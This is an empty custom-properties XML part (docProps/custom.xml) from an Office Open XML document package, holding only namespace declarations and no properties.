<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>